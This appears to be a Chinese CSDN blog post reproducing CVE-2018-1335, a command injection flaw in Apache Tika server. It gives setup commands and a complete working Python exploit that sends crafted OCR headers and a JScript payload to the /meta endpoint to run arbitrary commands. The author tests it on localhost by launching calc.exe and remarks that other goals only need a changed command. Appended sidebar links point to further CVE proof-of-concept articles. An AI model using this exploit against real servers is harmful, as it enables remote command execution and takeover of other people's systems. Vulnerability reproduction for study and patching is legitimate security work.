CVE-2018-1335的重现(附POC)

最新推荐文章于 2023-04-12 08:55:49 发布
最新推荐文章于 2023-04-12 08:55:49 发布
阅读量1.5k 收藏
点赞数
分类专栏: 安全测试 文章标签: CVE-2018-1335
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010051887/article/details/88665398
版权

这是一枚Apache Tika中的命令注入

我这里靶机是win10,攻击机是win10的linux子系统。关于这个环境,请看我的另一篇博文这里。所以这里我的IP都是localhost

在靶机上下载漏洞环境:

wget https://archive.apache.org/dist/tika/tika-server-1.17.jar

在靶机上运行漏洞环境:

java -jar tika-server-1.17.jar

 以下是payload,基于py3

还在用py2的同学只需要改print函数,去掉括号即可。

在攻击机上保存为CVE-2018-1335.py

import sys
import requests
 
if len(sys.argv) < 4:
        print("Usage: python CVE-2018-1335.py <host> <port> <command>")
        print("Example: python CVE-2018-1335.py localhost 9998 calc.exe")
else:
        host = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]
 
        url = host+":"+str(port)+"/meta"
 
        headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", 
                "X-Tika-OCRLanguage": "//E:Jscript", 
                "Expect": "100-continue", 
                "Content-type": "image/jp2", 
                "Connection": "close"}
 
        jscript='''var oShell = WScript.CreateObject("WScript.Shell");
        var oExec = oShell.Exec('cmd /c {}');
        '''.format(cmd)
 
        try:
                requests.put("https://"+url, headers=headers, data=jscript, verify=False)
         
        except:
                try:
                        requests.put("http://"+url, headers=headers, data=jscript)
                except:
                        print("Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>")

攻击机运行python3 CVE-2018-1335.py localhost 9998 calc.exe成功弹出计算器。

需要达成其他目的,只需要修改command部分。复杂的操作还是要修改payload。

菜鸟小小亮
关注
专栏目录
CVE-2019-0708漏洞复现(POC和靶机)
没有绝对的安全
09-16 2678
验证漏洞: 在MSF目录下新建一个rdp_scanner.rb,复制以下代码并保存。 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitMo...
CMS Made Simple (CMSMS) 前台SQL注入漏洞 CVE-2019-9053.md
04-08
CMS Made Simple(CMSMS)前台SQL注入漏洞 CVE-2019-9053 知识点: 1. 内容管理系统CMS:CMS Made Simple(CMSMS)是一种免费的开放源码内容管理系统,它为网站开发人员、程序员和网站所有者提供了一套基于网络的...
Apache Tika-server RCE(CVE-2018-1335)
公众号shadow sock7
03-13 1188
PoC:https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2018-1335 PUT /meta HTTP/1.1 Host: cqq.com:9998 Connection: close User-Agent: python-requests/2.19.1 X-Tika-OCRTesseractPath: &amp;amp;quot;cscript&amp;amp;quot; Co...
Apache Tika-server 命令执行漏洞(CVE-2018-1335)
weixin_44047654的博客
04-12 699
Apache Tika-server 命令执行漏洞(CVE-2018-1335)
CVE-2012-2316为例,总结一些已知Web软件漏洞重现的方法
qysh123的专栏
06-29 1948
这段时间由于实验和演示的需求,需要找一些已知的漏洞(最好有CVE编号)的Java软件。之前也做过很多这样的工作,特别是找过很多PHP的CVE漏洞。这次把基本的方法总结一下,也方便其他童鞋。 如果知道软件的名字,可以直接在这里搜索:http://web.nvd.nist.gov/view/vuln/search,就我个人体会而言,nist的搜索速度比CVE快很多。接下来以我们之前的一个研究对象
修改jar 注入_Apache Tika命令注入漏洞挖掘
weixin_39846664的博客
11-20 277
介绍这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤。CVE是https://nvd.nist.gov/vuln/detail/CVE-2018-1335。由于Apache Tika是开源的,我能够通过分析Apache Tika代码来确定问题。虽然命令注入漏洞通常很简单,但要实现完整的远程代码或命令执行需要克服一些障碍。这是由于Java处理执行操作系统命令的方式...
44913_sale3ho_CVE-2017-12636_POC_
09-30
标题 "44913_sale3ho_CVE-2017-12636_POC_" 提供的信息表明,这是一个与安全漏洞CVE-2017-12636相关的PoC(Proof of Concept)代码。POC通常是由安全研究人员或黑客创建的,用于证明一个特定漏洞确实存在并且可以被...
CVE-2021-21315v2
05-07
CVE-2021-21315系统信息 这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()...
CVE-2020-15999:Chrome和ftview中PoC的所有必要材料
05-30
在这里,您将拥有所有资源,以便在Google Chrome和Ftview(Ubuntu)中执行CVE-2020-15999的PoC。 此存储库中有两个文件夹,每个程序一个。 谷歌浏览器 为了重现漏洞利用,您必须安装 86.0.4240.111 版本之前的 ...
CVE-2023-25157-main(1).zip
07-19
提供的"CVE-2023-25157-main"压缩包文件很可能包含了用于重现该漏洞的详细步骤、测试环境、PoC(Proof of Concept)代码或者示例请求。这些资源对于学习和修复该问题至关重要。 在复现过程中,通常会包括以下步骤:...
cve-2018-20250 WinRAR代码执行漏洞演示
02-28
此视频是对与WinRAR 代码执行漏洞的演示视频,因为原漏洞发布厂商并没有发布对应的poc,和演示视频,特录制了视频方便大家观看效果,里面还带了大家最想要的poc ,希望对大家有帮助
远程桌面漏洞poc_【漏洞复现】CVE 2019-0708 漏洞利用
weixin_39625305的博客
11-18 210
0x00 前言 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。以上内容来自360网络安全响应中...
反序列化漏洞汇总
buffedon的博客
07-15 4502
JAVA反序列化、PHP反序列化,场景容器反序列化利用过程
Apache Tika 命令注入(CVE-2019-3396)
qq_36369941的博客
08-17 910
title: Apache Tika 命令注入(CVE-2019-3396) tags: [poc,cve] 简介 Apache Tika 工具集可以检测和提取上千种不同文件类型(比如PPT,XLS,PDF等)中的元数据和文本。所有的这些类型文件都可以通过一个单独的接口实现解析,这使Tika对搜索引擎的索引,目录分析和翻译等很有帮助。(https://tika.apache.org/) 影响范...
CVE-2018-13379 环境搭建+漏洞复现
yxngu
07-29 6828
正入万山圈子里,一山放过一山拦。
CVE-2018-8120 漏洞分析
weixin_34246551的博客
05-23 466
详细分析漏洞描述 Microsoft Windows 7 SP1、Windows Server 2008 SP2和Windows Server 2008 R2 SP1都是美国微软(Microsoft)公司的产品。Microsoft Windows 7 SP1是一套供个人电脑使用的操作系统;Windows Server 2008 SP2是一套服务器操作系统。R2 SP1是它的升级版。 Micro...
漏洞复现-Struts2-s2-057&&POC
qq_59350385的博客
05-17 1634
目录 环境搭建 复现工具 复现过程 (1)验证漏洞是否存在 (2)利用已有的POC(exp)复现 POC编写 PoC 编写流程 Poc编写涉及到的一些库 Web漏洞Poc编写基本方法 环境搭建 漏洞部署使用docker,源码下载链接https://github.com/vulhub/vulhub/tree/master/struts2/s2-057 启动环境: docker-compose up -d 访问:http://your-ip:8080/struts2-sho..
CVE-2018-20250 WinRAR代码执行漏洞演示(含poc
大哥一声吼
02-28 1649
原始参考链接:https://research.checkpoint.com/extracting-code-execution-from-winrar/ 视频演示链接(内含poc):https://download.csdn.net/download/helloexp/10981626 仅供学习研究使用 Using illegally share bear legal resp...
CVE-2018-15517的poc
最新发布
06-14
CVE-2018-15517是一个安全漏洞的标识符,它通常指的是一个特定的软件漏洞,可能导致未经授权的访问或攻击。这个漏洞可能与Adobe Flash Player有关,该软件在2018年存在一个严重的远程代码执行漏洞。PoC(Proof of ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值